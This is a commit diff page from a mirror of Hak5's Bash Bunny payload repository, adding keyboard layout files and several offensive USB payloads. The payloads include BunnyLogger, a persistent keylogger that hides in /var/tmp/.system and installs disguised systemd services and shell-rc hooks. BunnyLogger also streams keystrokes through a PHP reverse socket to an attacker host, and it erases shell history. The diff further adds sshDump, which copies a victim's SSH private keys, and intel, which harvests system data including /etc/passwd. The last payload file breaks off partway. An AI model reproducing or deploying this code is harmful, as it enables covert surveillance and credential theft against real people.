hak5
/
bashbunny-payloads
mirror of https://github.com/hak5/bashbunny-payloads.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge branch 'hak5:master' into master

pull/503/head
0iphor13 2022-03-14 12:08:11 +01:00 committed by GitHub
parent 09ab811f9c 2e297ba861
commit bc281bcfdc
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
23 changed files with 1170 additions and 4 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

6
README.md
View File

@ -6,14 +6,14 @@ This repository contains payloads and extensions for the Hak5 Bash Bunny. Commun
By emulating combinations of trusted USB devices — like gigabit Ethernet, serial, flash storage and keyboards — the Bash Bunny tricks computers into divulging data, exfiltrating documents, installing backdoors and many more exploits.
- [Purchase at Hak5](https://hak5.org/products/bash-bunny "Purchase at Hak5")
- [Documentation](https://docs.hak5.org/hc/en-us/categories/360000982534-Bash-Bunny "Documentation")
- [Bash Bunny Forums](https://forums.hak5.org/index.php?/forum/92-bash-bunny/ "Forums")
- [Documentation](https://docs.hak5.org/bash-bunny/ "Documentation")
- [Bash Bunny Forums](https://forums.hak5.org/forum/92-bash-bunny/ "Forums")
- Discord: [https://hak5.org/discord](https://hak5.org/discord)
![enter image description here](https://cdn.shopify.com/s/files/1/0068/2142/products/bash-bunny-mk2_001_c58d9658-b151-4328-af26-11eef3c47355_300x.jpg)
## Documentation
Documentation on developing payloads for the Bash Bunny can be found on the [docs.hak5.org](https://docs.hak5.org/hc/en-us/categories/360000982534-Bash-Bunny) website. Guides can be found on the [Bash Bunny blog](https://hak5.org/blogs/bash-bunny).
Documentation on developing payloads for the Bash Bunny can be found on the [docs.hak5.org](https://docs.hak5.org/bash-bunny/) website. Guides can be found on the [Bash Bunny blog](https://hak5.org/blogs/bash-bunny).
## Disclaimer
Generally, payloads may execute commands on your device. As such, it is possible for a payload to damage your device. Payloads from this repository are provided AS-IS without warranty. While Hak5 makes a best effort to review payloads, there are no guarantees as to their effectiveness. As with any script, you are advised to proceed with caution.

187
languages/hu.json Normal file
View File

@ -0,0 +1,187 @@
{
"__comment":"All numbers here are in hex format and 0x is ignored.",
"__comment":" ",
"__comment":"This list is in ascending order of 3rd byte (HID Usage ID).",
"__comment":" See section 10 Keyboard/Keypad Page (0x07)",
"__comment":" of document USB HID Usage Tables Version 1.12.",
"__comment":" ",
"__comment":"Definition of these 3 bytes can be found",
"__comment":" in section B.1 Protocol 1 (Keyboard)",
"__comment":" of document Device Class Definition for HID Version 1.11",
"__comment":" - byte 1: Modifier keys",
"__comment":" - byte 2: Reserved",
"__comment":" - byte 3: Keycode 1",
"__comment":" ",
"__comment":"Both documents can be obtained from link here",
"__comment":" http://www.usb.org/developers/hidpage/",
"__comment":" ",
"__comment":" Hungarian QWERTZ language made by Skeleton022",
"__comment":" Added áéíóöőúüűÁÉÍÓÖŐÚÜŰ",
"a":"00,00,04",
"b":"00,00,05",
"c":"00,00,06",
"d":"00,00,07",
"e":"00,00,08",
"f":"00,00,09",
"g":"00,00,0a",
"h":"00,00,0b",
"i":"00,00,0c",
"j":"00,00,0d",
"k":"00,00,0e",
"l":"00,00,0f",
"m":"00,00,10",
"n":"00,00,11",
"o":"00,00,12",
"p":"00,00,13",
"q":"00,00,14",
"r":"00,00,15",
"s":"00,00,16",
"t":"00,00,17",
"u":"00,00,18",
"v":"00,00,19",
"w":"00,00,1a",
"x":"00,00,1b",
"z":"00,00,1c",
"y":"00,00,1d",
"1":"00,00,1e",
"2":"00,00,1f",
"3":"00,00,20",
"4":"00,00,21",
"5":"00,00,22",
"6":"00,00,23",
"7":"00,00,24",
"8":"00,00,25",
"9":"00,00,26",
"ö":"00,00,27",
"ENTER":"00,00,28",
"ESC":"00,00,29",
"ESCAPE":"00,00,29",
"TAB":"00,00,2b",
" ":"00,00,2c",
"SPACE":"00,00,2c",
"ü":"00,00,2d",
"ó":"00,00,2e",
"ő":"00,00,2f",
"ú":"00,00,30",
"ű":"00,00,31",
"é":"00,00,33",
"á":"00,00,34",
"0":"00,00,35",
",":"00,00,36",
".":"00,00,37",
"-":"00,00,38",
"CAPSLOCK":"00,00,39",
"F1":"00,00,3a",
"F2":"00,00,3b",
"F3":"00,00,3c",
"F4":"00,00,3d",
"F5":"00,00,3e",
"F6":"00,00,3f",
"F7":"00,00,40",
"F8":"00,00,41",
"F9":"00,00,42",
"F10":"00,00,43",
"F11":"00,00,44",
"F12":"00,00,45",
"PRINTSCREEN":"00,00,46",
"SCROLLLOCK":"00,00,47",
"BREAK":"00,00,48",
"PAUSE":"00,00,48",
"INSERT":"00,00,49",
"HOME":"00,00,4a",
"PAGEUP":"00,00,4b",
"DEL":"00,00,4c",
"DELETE":"00,00,4c",
"END":"00,00,4d",
"PAGEDOWN":"00,00,4e",
"RIGHT":"00,00,4f",
"RIGHTARROW":"00,00,4f",
"LEFT":"00,00,50",
"LEFTARROW":"00,00,50",
"DOWN":"00,00,51",
"DOWNARROW":"00,00,51",
"UP":"00,00,52",
"UPARROW":"00,00,52",
"í":"00,00,64",
"APP":"00,00,65",
"MENU":"00,00,65",
"ALT-TAB":"00,00,71",
"CONTROL":"01,00,00",
"CTRL":"01,00,00",
"SHIFT":"02,00,00",
"A":"02,00,04",
"B":"02,00,05",
"C":"02,00,06",
"D":"02,00,07",
"E":"02,00,08",
"F":"02,00,09",
"G":"02,00,0a",
"H":"02,00,0b",
"I":"02,00,0c",
"J":"02,00,0d",
"K":"02,00,0e",
"L":"02,00,0f",
"M":"02,00,10",
"N":"02,00,11",
"O":"02,00,12",
"P":"02,00,13",
"Q":"02,00,14",
"R":"02,00,15",
"S":"02,00,16",
"T":"02,00,17",
"U":"02,00,18",
"V":"02,00,19",
"W":"02,00,1a",
"X":"02,00,1b",
"Z":"02,00,1c",
"Y":"02,00,1d",
"'":"02,00,1e",
"\"":"02,00,1f",
"+":"02,00,20",
"!":"02,00,21",
"%":"02,00,22",
"/":"02,00,23",
"=":"02,00,24",
"(":"02,00,25",
")":"02,00,26",
"Ö":"02,00,27",
"Ü":"02,00,2d",
"Ó":"02,00,2e",
"Ő":"02,00,2f",
"Ú":"02,00,30",
"Ű":"02,00,31",
"É":"02,00,33",
"Á":"02,00,34",
"?":"02,00,36",
":":"02,00,37",
"_":"02,00,38",
"Í":"02,00,64",
"CTRL-SHIFT":"03,00,00",
"ALT":"04,00,00",
"CTRL-ALT":"05,00,00",
"ALT-SHIFT":"06,00,00",
"COMMAND":"08,00,00",
"GUI":"08,00,00",
"WINDOWS":"08,00,00",
"COMMAND-OPTION":"12,00,00",
"COMMAND-CTRL-SHIFT":"12,00,00",
"COMMAND-CTRL":"12,00,00",
"COMMAND-OPTION-SHIFT'":"12,00,00",
"{":"40,00,05",
"&":"40,00,06",
"[":"40,00,09",
"]":"40,00,0a",
"}":"40,00,11",
"\\":"40,00,14",
"@":"40,00,19",
"|":"40,00,1a",
"#":"40,00,1b",
">":"40,00,1d",
"~":"40,00,1e",
"^":"40,00,20",
"`":"40,00,24",
"$":"40,00,33",
";":"40,00,36",
"*":"40,00,38",
"<":"40,00,64"
}

172
languages/jp.json Normal file
View File

@ -0,0 +1,172 @@
{
"__comment": "All numbers here are in hex format and 0x is ignored.",
"__comment": " ",
"__comment": "This list is in ascending order of 3rd byte (HID Usage ID).",
"__comment": " See section 10 Keyboard/Keypad Page (0x07)",
"__comment": " of document USB HID Usage Tables Version 1.12.",
"__comment": " ",
"__comment": "Definition of these 3 bytes can be found",
"__comment": " in section B.1 Protocol 1 (Keyboard)",
"__comment": " of document Device Class Definition for HID Version 1.11",
"__comment": " - byte 1: Modifier keys",
"__comment": " - byte 2: Reserved",
"__comment": " - byte 3: Keycode 1",
"__comment": " ",
"__comment": "Both documents can be obtained from link here",
"__comment": " http://www.usb.org/developers/hidpage/",
"__comment": " ",
"__comment": "A = LeftShift + a, { = LeftShift + [",
"__comment": " ",
"CTRL": "01,00,00",
"CONTROL": "01,00,00",
"SHIFT": "02,00,00",
"ALT": "04,00,00",
"GUI": "08,00,00",
"WINDOWS": "08,00,00",
"CTRL-ALT": "05,00,00",
"CTRL-SHIFT": "03,00,00",
"ALT-SHIFT": "06,00,00",
"__comment": "Below 5 key combinations are for Mac OSX",
"__comment": "Example: (COMMAND-OPTION SHIFT t) to open terminal",
"COMMAND": "08,00,00",
"COMMAND-CTRL": "09,00,00",
"COMMAND-CTRL-SHIFT": "0B,00,00",
"COMMAND-OPTION": "0C,00,00",
"COMMAND-OPTION-SHIFT": "0E,00,00",
"a": "00,00,04",
"A": "02,00,04",
"b": "00,00,05",
"B": "02,00,05",
"c": "00,00,06",
"C": "02,00,06",
"d": "00,00,07",
"D": "02,00,07",
"e": "00,00,08",
"E": "02,00,08",
"f": "00,00,09",
"F": "02,00,09",
"g": "00,00,0a",
"G": "02,00,0a",
"h": "00,00,0b",
"H": "02,00,0b",
"i": "00,00,0c",
"I": "02,00,0c",
"j": "00,00,0d",
"J": "02,00,0d",
"k": "00,00,0e",
"K": "02,00,0e",
"l": "00,00,0f",
"L": "02,00,0f",
"m": "00,00,10",
"M": "02,00,10",
"n": "00,00,11",
"N": "02,00,11",
"o": "00,00,12",
"O": "02,00,12",
"p": "00,00,13",
"P": "02,00,13",
"q": "00,00,14",
"Q": "02,00,14",
"r": "00,00,15",
"R": "02,00,15",
"s": "00,00,16",
"S": "02,00,16",
"t": "00,00,17",
"T": "02,00,17",
"u": "00,00,18",
"U": "02,00,18",
"v": "00,00,19",
"V": "02,00,19",
"w": "00,00,1a",
"W": "02,00,1a",
"x": "00,00,1b",
"X": "02,00,1b",
"y": "00,00,1c",
"Y": "02,00,1c",
"z": "00,00,1d",
"Z": "02,00,1d",
"1": "00,00,1e",
"!": "02,00,1e",
"2": "00,00,1f",
"\"": "02,00,1f",
"3": "00,00,20",
"#": "02,00,20",
"4": "00,00,21",
"$": "02,00,21",
"5": "00,00,22",
"%": "02,00,22",
"6": "00,00,23",
"&": "02,00,23",
"7": "00,00,24",
"'": "02,00,24",
"8": "00,00,25",
"(": "02,00,25",
"9": "00,00,26",
")": "02,00,26",
"0": "00,00,27",
"ENTER": "00,00,28",
"ESC": "00,00,29",
"ESCAPE": "00,00,29",
"BACKSPACE": "00,00,2a",
"TAB": "00,00,2b",
"ALT-TAB": "04,00,2b",
"SPACE": "00,00,2c",
" ": "00,00,2c",
"-": "00,00,2d",
"=": "02,00,2d",
"^": "00,00,2e",
"~": "02,00,2e",
"@": "00,00,2f",
"`": "02,00,2f",
"[": "00,00,30",
"{": "02,00,30",
"\\": "00,00,31",
"|": "02,00,31",
"]": "00,00,32",
"}": "02,00,32",
";": "00,00,33",
"+": "02,00,33",
":": "00,00,34",
"*": "02,00,34",
",": "00,00,36",
"<": "02,00,36",
".": "00,00,37",
">": "02,00,37",
"/": "00,00,38",
"?": "02,00,38",
"CAPSLOCK": "00,00,39",
"F1": "00,00,3a",
"F2": "00,00,3b",
"F3": "00,00,3c",
"F4": "00,00,3d",
"F5": "00,00,3e",
"F6": "00,00,3f",
"F7": "00,00,40",
"F8": "00,00,41",
"F9": "00,00,42",
"F10": "00,00,43",
"F11": "00,00,44",
"F12": "00,00,45",
"PRINTSCREEN":"00,00,46",
"SCROLLLOCK": "00,00,47",
"PAUSE": "00,00,48",
"BREAK": "00,00,48",
"INSERT": "00,00,49",
"HOME": "00,00,4a",
"PAGEUP": "00,00,4b",
"DELETE": "00,00,4c",
"DEL": "00,00,4c",
"END": "00,00,4d",
"PAGEDOWN": "00,00,4e",
"RIGHTARROW": "00,00,4f",
"RIGHT": "00,00,4f",
"LEFTARROW": "00,00,50",
"LEFT": "00,00,50",
"DOWNARROW": "00,00,51",
"DOWN": "00,00,51",
"UPARROW": "00,00,52",
"UP": "00,00,52",
"NUMLOCK": "00,00,53",
"MENU": "00,00,65",
"APP": "00,00,65"
}

173
languages/tr.json Normal file
View File

@ -0,0 +1,173 @@
{
"__comment": "All numbers here are in hex format and 0x is ignored.",
"__comment": " ",
"__comment": "This list is in ascending order of 3rd byte (HID Usage ID).",
"__comment": " See section 10 Keyboard/Keypad Page (0x07)",
"__comment": " of document USB HID Usage Tables Version 1.12.",
"__comment": " ",
"__comment": "Definition of these 3 bytes can be found",
"__comment": " in section B.1 Protocol 1 (Keyboard)",
"__comment": " of document Device Class Definition for HID Version 1.11",
"__comment": " - byte 1: Modifier keys",
"__comment": " - byte 2: Reserved",
"__comment": " - byte 3: Keycode 1",
"__comment": " ",
"__comment": "Both documents can be obtained from link here",
"__comment": " http://www.usb.org/developers/hidpage/",
"__comment": " ",
"__comment": "A = LeftShift + a, { = LeftShift + [",
"__comment": " ",
"CTRL": "01,00,00",
"CONTROL": "01,00,00",
"SHIFT": "02,00,00",
"ALT": "04,00,00",
"GUI": "08,00,00",
"WINDOWS": "08,00,00",
"CTRL-ALT": "05,00,00",
"CTRL-SHIFT": "03,00,00",
"ALT-SHIFT": "06,00,00",
"__comment": "Below 5 key combinations are for Mac OSX",
"__comment": "Example: (COMMAND-OPTION SHIFT t) to open terminal",
"COMMAND": "08,00,00",
"COMMAND-CTRL": "09,00,00",
"COMMAND-CTRL-SHIFT": "0B,00,00",
"COMMAND-OPTION": "0C,00,00",
"COMMAND-OPTION-SHIFT": "0E,00,00",
"a": "00,00,04",
"A": "02,00,04",
"b": "00,00,05",
"B": "02,00,05",
"c": "00,00,06",
"C": "02,00,06",
"d": "00,00,07",
"D": "02,00,07",
"e": "00,00,08",
"E": "02,00,08",
"f": "00,00,09",
"F": "02,00,09",
"g": "00,00,0a",
"G": "02,00,0a",
"h": "00,00,0b",
"H": "02,00,0b",
"i": "00,00,34",
"I": "02,00,0c",
"j": "00,00,0d",
"J": "02,00,0d",
"k": "00,00,0e",
"K": "02,00,0e",
"l": "00,00,0f",
"L": "02,00,0f",
"m": "00,00,10",
"M": "02,00,10",
"n": "00,00,11",
"N": "02,00,11",
"o": "00,00,12",
"O": "02,00,12",
"p": "00,00,13",
"P": "02,00,13",
"q": "00,00,14",
"Q": "02,00,14",
"r": "00,00,15",
"R": "02,00,15",
"s": "00,00,16",
"S": "02,00,16",
"t": "00,00,17",
"T": "02,00,17",
"u": "00,00,18",
"U": "02,00,18",
"v": "00,00,19",
"V": "02,00,19",
"w": "00,00,1a",
"W": "02,00,1a",
"x": "00,00,1b",
"X": "02,00,1b",
"y": "00,00,1c",
"Y": "02,00,1c",
"z": "00,00,1d",
"Z": "02,00,1d",
"1": "00,00,1e",
"!": "02,00,1e",
"2": "00,00,1f",
"@": "40,00,14",
"3": "00,00,20",
"#": "40,00,20",
"4": "00,00,21",
"$": "40,00,21",
"5": "00,00,22",
"%": "02,00,22",
"6": "00,00,23",
"^": "02,00,20",
"7": "00,00,24",
"&": "02,00,23",
"8": "00,00,25",
"*": "00,00,2d",
"9": "00,00,26",
"(": "02,00,25",
"0": "00,00,27",
")": "02,00,26",
"ENTER": "00,00,28",
"ESC": "00,00,29",
"ESCAPE": "00,00,29",
"BACKSPACE": "00,00,2a",
"TAB": "00,00,2b",
"ALT-TAB": "04,00,2b",
"SPACE": "00,00,2c",
" ": "00,00,2c",
"-": "00,00,2e",
"_": "02,00,2e",
"=": "02,00,27",
"+": "02,00,21",
"[": "40,00,25",
"{": "40,00,24",
"]": "40,00,26",
"}": "40,00,27",
"\\": "40,00,2d",
"|": "40,00,2e",
";": "02,00,31",
":": "02,00,38",
"'": "02,00,1f",
"\"": "00,00,35",
"`": "40,00,31",
"~": "40,00,30",
",": "00,00,31",
"<": "40,00,35",
".": "00,00,38",
">": "40,00,1e",
"/": "02,00,24",
"?": "02,00,2d",
"CAPSLOCK": "00,00,39",
"F1": "00,00,3a",
"F2": "00,00,3b",
"F3": "00,00,3c",
"F4": "00,00,3d",
"F5": "00,00,3e",
"F6": "00,00,3f",
"F7": "00,00,40",
"F8": "00,00,41",
"F9": "00,00,42",
"F10": "00,00,43",
"F11": "00,00,44",
"F12": "00,00,45",
"PRINTSCREEN":"00,00,46",
"SCROLLLOCK": "00,00,47",
"PAUSE": "00,00,48",
"BREAK": "00,00,48",
"INSERT": "00,00,49",
"HOME": "00,00,4a",
"PAGEUP": "00,00,4b",
"DELETE": "00,00,4c",
"DEL": "00,00,4c",
"END": "00,00,4d",
"PAGEDOWN": "00,00,4e",
"RIGHTARROW": "00,00,4f",
"RIGHT": "00,00,4f",
"LEFTARROW": "00,00,50",
"LEFT": "00,00,50",
"DOWNARROW": "00,00,51",
"DOWN": "00,00,51",
"UPARROW": "00,00,52",
"UP": "00,00,52",
"NUMLOCK": "00,00,53",
"MENU": "00,00,65",
"APP": "00,00,65"
}

62
payloads/library/credentials/BunnyLogger/README.md Normal file
View File

@ -0,0 +1,62 @@
## About:
* Title: BunnyLogger
* Description: Key logger which sends each and every key stroke of target remotely/locally.
* AUTHOR: drapl0n
* Version: 1.0
* Category: Credentials
* Target: Unix-like operating systems with systemd.
* Attackmodes: HID, Storage
## BunnyLogger: BunnyLogger is a Key Logger which captures every key stroke of traget and send them to attacker.
### Features:
* Live keystroke capturing.
* Detailed key logs.
* Persistent
* Autostart payload on boot.
### Workflow:
* Encoding payload and injecting on target's system.
* Checks whether internet is connected to the target system.
* If internet is connected then it sends raw keystrokes to attacker.
* Attacker processes raw keystrokes.
### Changes to be made in payload.sh:
* Replace ip(0.0.0.0) and port number(4444) with your servers ip address and port number on line no `11`.
* Increase/Decrease time interval to restart service periodically (Default is 15 mins), on line no `15`.
### LED Status:
* `SETUP` : MAGENTA
* `ATTACK` : YELLOW
* `FINISH` : GREEN
### Directory Structure of payload components:
| FileName | Directory |
| -------------- | ----------------------------- |
| payload.txt | /payload/switch1/ |
| payload.sh | /payload/ |
| xinput | /tools/ |
### Usage:
1. Encode payload.txt and inject into target's system.
2. Start netcat listner on attacking system:
* `nc -lvp <port number> > <log filename>` use this command to create new logfile with raw keystrokes.
* `nc -lvp <port number> >> <log filename>` use this command to append raw keystrokes to existing logfile.
3. Process raw keystrokes using BunnyLoggerDecoder utility:
```
./bunnyLoggerDecoder
bunnyLoggerDecoder is used to decode raw key strokes acquired by bunnyLogger.
Usage:
Decode captured log: [./bunnyLoggerDecoder -f <Logfile> -m <mode> -o <output file>]
Options:
-f Specify Log file.
-m Select Mode(normal|informative)
-o Specify Output file.
-h For this banner.
```
#### Support me if you like my work:
* https://twitter.com/drapl0n

50
payloads/library/credentials/BunnyLogger/bunnyLoggerDecoder Normal file
View File

@ -0,0 +1,50 @@
usage () {
echo -e "BunnyLoggerDecoder is used to decode raw key strokes acquired by BunnyLogger.\n"
echo -e "Usage: \nDecode captured log:\t[./bunnyLoggerDecoder -f <Logfile> -m <mode> -o <output file>]";
echo -e "\nOptions:"
echo -e "-f\tSpecify Log file."
echo -e "-m\tSelect Mode(normal|informative)"
echo -e "-o\tSpecify Output file."
echo -e "-h\tFor this banner."
}
while getopts o:m:f:h: flag
do
case "${flag}" in
o) output=$OPTARG ;;
m) mode=$OPTARG ;;
f) filename=$OPTARG ;;
h) help=$OPTARG ;;
*)
usage
exit 1
esac
done
if [ -z "$output" ] && [ -z "$filename" ]; then
usage
exit 1
fi
if [ -z "$filename" ]; then
echo -e "BunnyLoggerDecoder: Missing option \"-f\"(Log file not specified).\nUse \"-h\" for more information." >&2
exit 1
fi
if [ -z "$output" ]; then
echo -e "BunnyLoggerDecoder: Missing option \"-o\"(Output file not specified).\nUse \"-h\" for help." >&2
exit 1
fi
if [ -z "$mode" ]; then
echo -e "BunnyLoggerDecoder: Missing option \"-m\"(Mode not specified).\nUse \"-h\" for help." >&2
exit 1
fi
if [ "$mode" != "informative" ] && [ "$mode" != "normal" ]; then
echo -e "BunnyLoggerDecoder: Invalid mode \"$mode\".\nUse \"-h\" for help." >&2
exit 1
fi
if [ "$mode" == "normal" ] ; then
awk 'BEGIN{while (("xmodmap -pke" | getline) > 0) k[$2]=$4} {print $0 "[" k [$NF] "]"}' $filename | grep press | awk '{print $4}' > $output
exit 1
fi
if [ "$mode" == "informative" ] ; then
awk 'BEGIN{while (("xmodmap -pke" | getline) > 0) k[$2]=$4} {print $0 "[" k [$NF] "]"}' $filename > $output
exit 1
fi

24
payloads/library/credentials/BunnyLogger/payload.sh Normal file
View File

@ -0,0 +1,24 @@
#!/bin/bash
unset HISTFILE && HISTSIZE=0 && rm -f $HISTFILE && unset HISTFILE
mkdir /var/tmp/.system
lol=$(lsblk | grep 1.8G)
disk=$(echo $lol | awk '{print $1}')
mntt=$(lsblk | grep $disk | awk '{print $7}')
cp -r $mntt/tools/xinput /var/tmp/.system/
echo "/var/tmp/.system/./xinput list | grep -Po 'id=\K\d+(?=.*slave\s*keyboard)' | xargs -P0 -n1 /var/tmp/.system/./xinput test" > /var/tmp/.system/sys
chmod +x /var/tmp/.system/sys
chmod +x /var/tmp/.system/xinput
echo -e "while :\ndo\n\tping -c 5 0.0.0.0\n\tif [ $? -eq 0 ]; then\n\t\tphp -r '\$sock=fsockopen(\"0.0.0.0\",4444);exec("\"/var/tmp/.system/sys -i "<&3 >&3 2>&3"\"");'\n\tfi\ndone" > /var/tmp/.system/systemBus
chmod +x /var/tmp/.system/systemBus
mkdir -p ~/.config/systemd/user
echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=multi-user.target" > ~/.config/systemd/user/systemBUS.service
echo "while true; do systemctl --user restart systemBUS.service; sleep 15m; done" > /var/tmp/.system/reboot
chmod +x /var/tmp/.system/reboot
echo -e "[Unit]\nDescription= System BUS handler reboot.\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/reboot -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=multi-user.target" > ~/.config/systemd/user/reboot.service
systemctl --user daemon-reload
systemctl --user enable --now systemBUS.service
systemctl --user start --now systemBUS.service
systemctl --user enable --now reboot.service
systemctl --user start --now reboot.service
echo -e "ls -a | grep 'zshrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo \"systemctl --user enable --now reboot.service && systemctl --user enable --now systemBUS.service\" >> ~/.zshrc\nfi\n\nls -a | grep 'bashrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo \"systemctl --user enable --now reboot.service && systemctl --user enable --now systemBUS.service\" >> ~/.bashrc\nfi" > ~/tmmmp
chmod +x ~/tmmmp && cd ~/ && ./tmmmp && rm tmmmp && exit

56
payloads/library/credentials/BunnyLogger/payload.txt Normal file
View File

@ -0,0 +1,56 @@
# Title: BunnyLogger
# Description: Key logger which sends each and every key stroke of target remotely/locally.
# AUTHOR: drapl0n
# Version: 1.0
# Category: Credentials
# Target: Unix-like operating systems with systemd.
# Attackmodes: HID, Storage
LED SETUP
ATTACKMODE STORAGE HID
GET SWITCH_POSITION
LED ATTACK
Q DELAY 1000
Q CTRL-ALT t
Q DELAY 1000
# [Prevent storing history]
Q STRING unset HISTFILE
Q ENTER
Q DELAY 200
# [Fetching BashBunny's block device]
Q STRING lol='$(lsblk | grep 1.8G)'
Q ENTER
Q DELAY 100
Q STRING disk='$(echo $lol | awk '\'{print\ '$1'}\'\)''
Q ENTER
Q DELAY 200
# [Mounting BashBunny]
Q STRING udisksctl mount -b /dev/'$disk' /tmp/tmppp
Q ENTER
Q DELAY 2000
Q STRING mntt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)''
Q ENTER
Q DELAY 500
# [transfering payload script]
Q STRING cp -r '$mntt'/payloads/payload.sh /tmp/
Q ENTER
Q STRING chmod +x /tmp/payload.sh
Q ENTER
Q STRING /tmp/./payload.sh
Q ENTER
Q DELAY 2000
Q STRING rm /tmp/payload.sh
Q ENTER
Q DELAY 500
# [Unmounting BashBunny]
Q STRING udisksctl unmount -b /dev/'$disk'
Q ENTER
Q DELAY 500
Q STRING exit
Q ENTER
LED FINISH

BIN
payloads/library/credentials/BunnyLogger/xinput Normal file
View File

Binary file not shown.

49
payloads/library/credentials/sshDump/payload.txt Normal file
View File

@ -0,0 +1,49 @@
# Title: sshDump
# Description: Taking advantage of plain stored ssh private keys in home dir, sshDump grabs them for you.
# AUTHOR: drapl0n
# Version: 1.0
# Category: Credentials
# Target: GNU/Linux.
# Attackmodes: HID, Storage.
LED SETUP
ATTACKMODE STORAGE HID
GET SWITCH_POSITION
LED ATTACK
Q DELAY 1000
Q CTRL-ALT t
Q DELAY 1000
# [Prevent storing history]
Q STRING unset HISTFILE
Q ENTER
Q DELAY 200
# [Fetching BashBunny's block device]
Q STRING lol='$(lsblk | grep 1.8G)'
Q ENTER
Q DELAY 100
Q STRING disk='$(echo $lol | awk '\'{print\ '$1'}\'\)''
Q ENTER
Q DELAY 200
# [Mounting BashBunny]
Q STRING udisksctl mount -b /dev/'$disk' /tmp/tmppp
Q ENTER
Q DELAY 2000
Q STRING mntt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)''
Q ENTER
Q DELAY 500
# [Looting]
Q STRING cp -r '~/.ssh' '$mntt/loot/SSH'
Q ENTER
Q DELAY 2000
# [Unmounting BashBunny]
Q STRING udisksctl unmount -b /dev/'$disk'
Q ENTER
Q DELAY 500
Q STRING exit
Q ENTER
LED FINISH

24
payloads/library/exfiltration/intel/README.md Normal file
View File

@ -0,0 +1,24 @@
# intel(intelligence)
## About:
* Title: intel
* Description: intel(intelligence) payload collects detailed information of victims machine.
* AUTHOR: drapl0n
* Version: 1.0
* Category: Exfiltration
* Target: GNU/Linux
* Attackmodes: HID, Storage
## intel(intelligence) payload collects detailed information of victims machine.
### Workflow:
1. Prevent storing history.
2. Fetching BashBunny's block device.
3. Mounting BashBunny.
4. Transfering payload script and executing it.
5. Deleting script from victims system.
6. Unmounting BashBunny.
#### Support me if you like my work:
* https://twitter.com/drapl0n

67
payloads/library/exfiltration/intel/intel.sh Normal file
View File

@ -0,0 +1,67 @@
lol=$(lsblk | grep 1.8G)
disk=$(echo $lol | awk '{print $1}')
mntt=$(lsblk | grep $disk | awk '{print $7}')
echo -e "*******************************************" >> $mntt/loot/intel
echo "Network Schema:" >> $mntt/loot/intel
echo -e "*******************************************" >> $mntt/loot/intel
echo -e "\n" >> $mntt/loot/intel
nmap -sV localhost >> $mntt/loot/intel
echo -e "\n" >> $mntt/loot/intel
echo -e "*******************************************" >> $mntt/loot/intel
echo "Network Interfaces:" >> $mntt/loot/intel
echo -e "*******************************************" >> $mntt/loot/intel
ifconfig >> $mntt/loot/intel
echo -e "\n" >> $mntt/loot/intel
ip addr >> $mntt/loot/intel
echo -e "\n" >> $mntt/loot/intel
iwconfig >> $mntt/loot/intel
echo -e "\n" >> $mntt/loot/intel
echo -e "*******************************************" >> $mntt/loot/intel
echo Storage Info: >> $mntt/loot/intel
echo -e "*******************************************" >> $mntt/loot/intel
findmnt >> $mntt/loot/intel
echo -e "\n" >> $mntt/loot/intel
cat /etc/fstab >> $mntt/loot/intel
echo -e "\n" >> $mntt/loot/intel
echo -e "*******************************************" >> $mntt/loot/intel
echo "USB Info:" >> $mntt/loot/intel
echo -e "*******************************************" >> $mntt/loot/intel
lsusb -v >> $mntt/loot/intel
echo -e "\n" >> $mntt/loot/intel
echo -e "*******************************************" >> $mntt/loot/intel
echo "PCI Info:" >> $mntt/loot/intel
echo -e "*******************************************" >> $mntt/loot/intel
lspci -vvv >> $mntt/loot/intel
echo -e "\n" >> $mntt/loot/intel
echo -e "*******************************************" >> $mntt/loot/intel
echo "CPU Info:" >> $mntt/loot/intel
echo -e "*******************************************" >> $mntt/loot/intel
lscpu >> $mntt/loot/intel
echo -e "\n" >> $mntt/loot/intel
echo -e "*******************************************" >> $mntt/loot/intel
echo "Systemd services:" >> $mntt/loot/intel
echo -e "*******************************************" >> $mntt/loot/intel
systemctl list-units >> $mntt/loot/intel
echo -e "\n" >> $mntt/loot/intel
echo -e "*******************************************" >> $mntt/loot/intel
echo User/groups: >> $mntt/loot/intel
echo -e "*******************************************" >> $mntt/loot/intel
id >> $mntt/loot/intel
echo -e "\n" >> $mntt/loot/intel
cat /etc/passwd >> $mntt/loot/intel
echo -e "\n" >> $mntt/loot/intel
echo -e "*******************************************" >> $mntt/loot/intel
echo "Installed packages:" >> $mntt/loot/intel
echo -e "*******************************************" >> $mntt/loot/intel
pacman -Q >> $mntt/loot/intel || apt list --installed >> $mntt/loot/intel || dpkg -l >> $mntt/loot/intel || apk info >> $mntt/loot/intel || yum list installed >> $mntt/loot/intel || dnf list installed >> $mntt/loot/intel || zypper se --installed-only >> $mntt/loot/intel || rpm -qa >> $mntt/loot/intel
echo -e "\n" >> $mntt/loot/intel
snap list >> $mntt/loot/intel
echo -e "\n" >> $mntt/loot/intel
flatpak list --app >> $mntt/loot/intel
echo -e "\n" >> $mntt/loot/intel
echo -e "******************************************" >> $mntt/loot/intel
echo "Directory Structure:" >> $mntt/loot/intel
echo -e "*******************************************" >> $mntt/loot/intel
find * / >> $mntt/loot/intel
echo -e "\n" >> $mntt/loot/intel
echo -e "******************************************" >> $mntt/loot/intel

56
payloads/library/exfiltration/intel/payload.txt Normal file
View File

@ -0,0 +1,56 @@
# Title: intel
# Description: intel(intelligence) payload collects detailed information of victims machine.
# AUTHOR: drapl0n
# Version: 1.0
# Category: Exfiltration
# Target: GNU/Linux operating systems.
# Attackmodes: HID, Storage.
LED SETUP
ATTACKMODE STORAGE HID
GET SWITCH_POSITION
LED ATTACK
Q DELAY 1000
Q CTRL-ALT t
Q DELAY 1000
# [Prevent storing history]
Q STRING unset HISTFILE
Q ENTER
Q DELAY 200
# [Fetching BashBunny's block device]
Q STRING lol='$(lsblk | grep 1.8G)'
Q ENTER
Q DELAY 100
